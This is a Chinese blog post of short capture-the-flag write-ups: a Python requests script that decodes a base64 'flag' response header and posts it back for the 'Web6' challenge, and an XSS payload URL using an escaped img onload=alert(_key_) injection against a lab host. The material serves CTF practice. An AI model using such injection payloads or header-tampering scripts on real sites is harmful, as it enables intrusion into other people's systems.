每日作业

Web6

查看源码

 

用burpsuit抓包,发现一串特殊的字符,

PHPSESSID=e52n99cc62ovgnb8gdh9sk8m3olcjtbm

和flag 但感觉这出来的太直接来了

flag:6LeR55qE6L+Y5LiN6ZSZ77yM57uZ5L2gZmxhZ+WQpzogT1RjeE16QTU=

Base64解码,但这个key不对

 

得重新想思路

 

观察就会发现,每次访问的时候cookie是会变化的python脚本

#coding:utf-8

import requests,base64

import re

url='http://120.24.86.145:8002/web6/'

value=[0]*1000000

s=requests.Session()

content = s.post(url)

html = content.headers['flag']

flag = base64.b64decode(base64.b64decode(html)[-8:])

#print flag

data = {'margin':flag}

content = s.post(url,data=data)

printcontent.text

 

脚本来自Assassin__is__me的博客

 


 

Xss

 

 

来自http://blog.csdn.net/bcbobo21cn/article/details/51803435

 


前台请求一个接口,接口返回一些 HTML 标签拼接成的字符串,以供前端直接 innerHTML 生成 DOM 元素,这样的做法非常普遍。但是你是否遇到过,如果字符串中拼接的 HTML 标签中有 script 标签,那么该段脚本是无法执行的,这并不是 bug,而是 w3c 的文档规定的。来自http://www.cnblogs.com/zichi/p/run-innerHTML-script.html

 

http://103.238.227.13:10089/?id=xxxx

http://103.238.227.13:10089/?id=\u003cimg%20src=1%20onload=alert(_key_)\u003e





评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值